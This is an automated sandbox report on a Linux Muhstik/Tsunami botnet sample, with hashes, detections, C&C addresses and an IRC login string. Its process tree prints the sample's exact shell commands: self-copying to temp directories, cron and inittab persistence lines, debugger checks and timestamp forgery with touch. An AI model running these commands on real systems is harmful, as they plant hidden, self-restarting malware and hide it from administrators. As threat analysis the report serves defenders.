Play interactive tour

Edit tour

Linux Analysis Report pty4

Overview

General Information

Sample Name:	pty4
Analysis ID:	544443
MD5:	7b4f1c79f1edcb6b36a92debd5a81b96
SHA1:	0193f962cf141afd8be8d5d252ac7c2511138860
SHA256:	601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6
Tags:	elflog4j
Infos:

Detection

Muhstik Tsunami

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Muhstik

Multi AV Scanner detection for submitted file

Yara detected Tsunami

Uses IRC for communication with a C&C

Writes identical ELF files to multiple locations

Sample tries to persist itself using cron

Explicitly modifies time stamps using the "touch" command

Executes the "crontab" command typically for achieving persistence

Uses known network protocols on non-standard ports

Sample contains only a LOAD segment without any section mappings

Writes ELF files to disk

Executes the "grep" command used to find patterns in files or piped streams

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Writes crontab like entries to files to /var or /etc typically for achieving persistence

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Executes the "touch" command used to create files or modify time stamps

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544443
Start date:	23.12.2021
Start time:	11:26:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pty4
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal96.troj.evad.lin@0/23@2/0

Process Tree

system is lnxubuntu20

pty4 (PID: 5218, Parent: 5115, MD5: 7b4f1c79f1edcb6b36a92debd5a81b96) Arguments: /tmp/pty4

pty4 New Fork (PID: 5219, Parent: 5218)

sh (PID: 5219, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x strace > /dev/null"

sh New Fork (PID: 5220, Parent: 5219)

pidof (PID: 5220, Parent: 5219, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x strace

pty4 New Fork (PID: 5221, Parent: 5218)

sh (PID: 5221, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x tcpdump > /dev/null"

sh New Fork (PID: 5222, Parent: 5221)

pidof (PID: 5222, Parent: 5221, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x tcpdump

pty4 New Fork (PID: 5225, Parent: 5218)

pty4 New Fork (PID: 5227, Parent: 5225)

sh (PID: 5227, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -r"

sh New Fork (PID: 5235, Parent: 5227)

crontab (PID: 5235, Parent: 5227, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -r

pty4 New Fork (PID: 5226, Parent: 5218)

pty4 New Fork (PID: 5229, Parent: 5226)

sh (PID: 5229, Parent: 5226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /tmp/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty4 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5232, Parent: 5229)

crontab (PID: 5232, Parent: 5229, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5233, Parent: 5229)

grep (PID: 5233, Parent: 5229, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /tmp/pty4

sh New Fork (PID: 5234, Parent: 5229)

grep (PID: 5234, Parent: 5229, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5238, Parent: 5229)

sh New Fork (PID: 5240, Parent: 5238)

crontab (PID: 5240, Parent: 5238, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5239, Parent: 5229)

crontab (PID: 5239, Parent: 5229, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty4 New Fork (PID: 5228, Parent: 5218)

sh (PID: 5228, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/pty4\" > /etc/inittab2"

sh New Fork (PID: 5230, Parent: 5228)

cat (PID: 5230, Parent: 5228, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5231, Parent: 5228)

grep (PID: 5231, Parent: 5228, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /tmp/pty4

pty4 New Fork (PID: 5237, Parent: 5218)

sh (PID: 5237, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/pty4\" >> /etc/inittab2"

pty4 New Fork (PID: 5241, Parent: 5218)

sh (PID: 5241, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5242, Parent: 5241)

cat (PID: 5242, Parent: 5241, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty4 New Fork (PID: 5243, Parent: 5218)

sh (PID: 5243, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5244, Parent: 5243)

rm (PID: 5244, Parent: 5243, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty4 New Fork (PID: 5245, Parent: 5218)

sh (PID: 5245, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5246, Parent: 5245)

touch (PID: 5246, Parent: 5245, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty4 New Fork (PID: 5247, Parent: 5218)

pty4 New Fork (PID: 5249, Parent: 5247)

sh (PID: 5249, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty4 /dev/shm/pty4"

sh New Fork (PID: 5252, Parent: 5249)

cp (PID: 5252, Parent: 5249, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty4 /dev/shm/pty4

pty4 New Fork (PID: 5253, Parent: 5247)

pty4 New Fork (PID: 5255, Parent: 5253)

sh (PID: 5255, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /dev/shm/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty4 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5257, Parent: 5255)

crontab (PID: 5257, Parent: 5255, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5259, Parent: 5255)

grep (PID: 5259, Parent: 5255, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /dev/shm/pty4

sh New Fork (PID: 5260, Parent: 5255)

grep (PID: 5260, Parent: 5255, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5262, Parent: 5255)

sh New Fork (PID: 5264, Parent: 5262)

crontab (PID: 5264, Parent: 5262, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5263, Parent: 5255)

crontab (PID: 5263, Parent: 5255, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty4 New Fork (PID: 5254, Parent: 5247)

sh (PID: 5254, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty4\" > /etc/inittab2"

sh New Fork (PID: 5256, Parent: 5254)

cat (PID: 5256, Parent: 5254, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5258, Parent: 5254)

grep (PID: 5258, Parent: 5254, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /dev/shm/pty4

pty4 New Fork (PID: 5261, Parent: 5247)

sh (PID: 5261, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/dev/shm/pty4\" >> /etc/inittab2"

pty4 New Fork (PID: 5265, Parent: 5247)

sh (PID: 5265, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5266, Parent: 5265)

cat (PID: 5266, Parent: 5265, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty4 New Fork (PID: 5267, Parent: 5247)

sh (PID: 5267, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5268, Parent: 5267)

rm (PID: 5268, Parent: 5267, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty4 New Fork (PID: 5269, Parent: 5247)

sh (PID: 5269, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5270, Parent: 5269)

touch (PID: 5270, Parent: 5269, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty4 New Fork (PID: 5271, Parent: 5247)

sh (PID: 5271, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty4 /var/tmp/pty4"

sh New Fork (PID: 5272, Parent: 5271)

cp (PID: 5272, Parent: 5271, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty4 /var/tmp/pty4

pty4 New Fork (PID: 5273, Parent: 5247)

pty4 New Fork (PID: 5275, Parent: 5273)

sh (PID: 5275, Parent: 5273, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/tmp/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty4 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5278, Parent: 5275)

crontab (PID: 5278, Parent: 5275, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5279, Parent: 5275)

grep (PID: 5279, Parent: 5275, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/tmp/pty4

sh New Fork (PID: 5280, Parent: 5275)

grep (PID: 5280, Parent: 5275, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5282, Parent: 5275)

sh New Fork (PID: 5284, Parent: 5282)

crontab (PID: 5284, Parent: 5282, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5283, Parent: 5275)

crontab (PID: 5283, Parent: 5275, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty4 New Fork (PID: 5274, Parent: 5247)

sh (PID: 5274, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty4\" > /etc/inittab2"

sh New Fork (PID: 5276, Parent: 5274)

cat (PID: 5276, Parent: 5274, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5277, Parent: 5274)

grep (PID: 5277, Parent: 5274, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/tmp/pty4

pty4 New Fork (PID: 5281, Parent: 5247)

sh (PID: 5281, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/tmp/pty4\" >> /etc/inittab2"

pty4 New Fork (PID: 5285, Parent: 5247)

sh (PID: 5285, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5286, Parent: 5285)

cat (PID: 5286, Parent: 5285, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty4 New Fork (PID: 5287, Parent: 5247)

sh (PID: 5287, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5288, Parent: 5287)

rm (PID: 5288, Parent: 5287, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty4 New Fork (PID: 5289, Parent: 5247)

sh (PID: 5289, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5290, Parent: 5289)

touch (PID: 5290, Parent: 5289, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty4 New Fork (PID: 5291, Parent: 5247)

sh (PID: 5291, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty4 /var/lock/pty4"

sh New Fork (PID: 5292, Parent: 5291)

cp (PID: 5292, Parent: 5291, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty4 /var/lock/pty4

pty4 New Fork (PID: 5293, Parent: 5247)

pty4 New Fork (PID: 5295, Parent: 5293)

sh (PID: 5295, Parent: 5293, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/lock/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty4 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5298, Parent: 5295)

crontab (PID: 5298, Parent: 5295, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5299, Parent: 5295)

grep (PID: 5299, Parent: 5295, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/lock/pty4

sh New Fork (PID: 5300, Parent: 5295)

grep (PID: 5300, Parent: 5295, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5303, Parent: 5295)

sh New Fork (PID: 5305, Parent: 5303)

crontab (PID: 5305, Parent: 5303, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5304, Parent: 5295)

crontab (PID: 5304, Parent: 5295, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty4 New Fork (PID: 5294, Parent: 5247)

sh (PID: 5294, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty4\" > /etc/inittab2"

sh New Fork (PID: 5296, Parent: 5294)

cat (PID: 5296, Parent: 5294, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5297, Parent: 5294)

grep (PID: 5297, Parent: 5294, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/lock/pty4

pty4 New Fork (PID: 5301, Parent: 5247)

sh (PID: 5301, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/lock/pty4\" >> /etc/inittab2"

pty4 New Fork (PID: 5302, Parent: 5247)

sh (PID: 5302, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5306, Parent: 5302)

cat (PID: 5306, Parent: 5302, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty4 New Fork (PID: 5307, Parent: 5247)

sh (PID: 5307, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5310, Parent: 5307)

rm (PID: 5310, Parent: 5307, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty4 New Fork (PID: 5311, Parent: 5247)

sh (PID: 5311, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5312, Parent: 5311)

touch (PID: 5312, Parent: 5311, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty4 New Fork (PID: 5313, Parent: 5247)

sh (PID: 5313, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty4 /var/run/pty4"

sh New Fork (PID: 5314, Parent: 5313)

cp (PID: 5314, Parent: 5313, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty4 /var/run/pty4

pty4 New Fork (PID: 5315, Parent: 5247)

pty4 New Fork (PID: 5317, Parent: 5315)

sh (PID: 5317, Parent: 5315, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/run/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty4 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5320, Parent: 5317)

crontab (PID: 5320, Parent: 5317, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5321, Parent: 5317)

grep (PID: 5321, Parent: 5317, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/run/pty4

sh New Fork (PID: 5322, Parent: 5317)

grep (PID: 5322, Parent: 5317, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5324, Parent: 5317)

sh New Fork (PID: 5326, Parent: 5324)

crontab (PID: 5326, Parent: 5324, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5325, Parent: 5317)

crontab (PID: 5325, Parent: 5317, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty4 New Fork (PID: 5316, Parent: 5247)

sh (PID: 5316, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/run/pty4\" > /etc/inittab2"

sh New Fork (PID: 5318, Parent: 5316)

cat (PID: 5318, Parent: 5316, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5319, Parent: 5316)

grep (PID: 5319, Parent: 5316, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/run/pty4

pty4 New Fork (PID: 5323, Parent: 5247)

sh (PID: 5323, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/run/pty4\" >> /etc/inittab2"

pty4 New Fork (PID: 5327, Parent: 5247)

sh (PID: 5327, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5328, Parent: 5327)

cat (PID: 5328, Parent: 5327, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty4 New Fork (PID: 5329, Parent: 5247)

sh (PID: 5329, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5330, Parent: 5329)

rm (PID: 5330, Parent: 5329, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty4 New Fork (PID: 5331, Parent: 5247)

sh (PID: 5331, Parent: 5247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5332, Parent: 5331)

touch (PID: 5332, Parent: 5331, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty4 New Fork (PID: 5248, Parent: 5218)

pty4 New Fork (PID: 5250, Parent: 5248)

sh (PID: 5250, Parent: 5248, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/uname -n"

sh New Fork (PID: 5251, Parent: 5250)

uname (PID: 5251, Parent: 5250, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: /bin/uname -n

cleanup

Yara Overview

Memory Dumps

Source	Rule	Description	Author
5315.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5315.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5293.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5293.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5253.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5253.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5273.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5273.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5218.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5218.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5226.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5226.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5225.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5225.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5247.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5247.1.000000001a887bdc.000000000b831e49.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
Process Memory Space: pty4 PID: 5218	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5225	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5226	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5247	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5253	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5273	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5293	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty4 PID: 5315	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Click to see the 19 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: pty4	Virustotal: Detection: 36%			Perma Link
Source: pty4	ReversingLabs: Detection: 44%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2034743 ET TROJAN ELF/Muhstik Botnet CnC Activity 192.168.2.23:48714 -> 156.67.220.165:8080

Uses IRC for communication with a C&C

Show sources

Source: unknown

IRC traffic detected: 192.168.2.23:48714 -> 156.67.220.165:8080 NICK i586|LOG|i|0|3843249|galassia USER x01 localhost localhost :muhstik-11052018

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080
Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:48042 -> 198.8.91.14:8080
Source: global traffic	TCP traffic: 192.168.2.23:48714 -> 156.67.220.165:8080
Source: global traffic	TCP traffic: 192.168.2.23:48812 -> 23.95.222.119:777

Source: unknown

DNS traffic detected: query: l.deutschland-zahlung.net replaycode: Name error (3)

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 198.8.91.14
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.222.119
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: l.deutschland-zahlung.net

Source: LOAD without section mappings

Program segment: 0xc01000

Source: classification engine

Classification label: mal96.troj.evad.lin@0/23@2/0

Persistence and Installation Behavior:

Writes identical ELF files to multiple locations

Show sources

Source: /usr/bin/cp (PID: 5252)	File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: /dev/shm/pty4	Jump to dropped file
Source: /usr/bin/cp (PID: 5272)	File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: /var/tmp/pty4	Jump to dropped file
Source: /usr/bin/cp (PID: 5292)	File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: /run/lock/pty4	Jump to dropped file
Source: /usr/bin/cp (PID: 5314)	File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: /run/pty4	Jump to dropped file

Sample tries to persist itself using cron

Show sources

Source: /usr/bin/crontab (PID: 5239)	File: /var/spool/cron/crontabs/tmp.X7EnDn	Jump to behavior
Source: /usr/bin/crontab (PID: 5239)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5263)	File: /var/spool/cron/crontabs/tmp.qptud8	Jump to behavior
Source: /usr/bin/crontab (PID: 5263)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5283)	File: /var/spool/cron/crontabs/tmp.sabPpE	Jump to behavior
Source: /usr/bin/crontab (PID: 5283)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5304)	File: /var/spool/cron/crontabs/tmp.ySVvsi	Jump to behavior
Source: /usr/bin/crontab (PID: 5304)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5325)	File: /var/spool/cron/crontabs/tmp.EDmAaQ	Jump to behavior
Source: /usr/bin/crontab (PID: 5325)	File: /var/spool/cron/crontabs/root	Jump to behavior

Explicitly modifies time stamps using the "touch" command

Show sources

Source: /bin/sh (PID: 5246)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5270)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5290)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5312)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5332)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior

Executes the "crontab" command typically for achieving persistence

Show sources

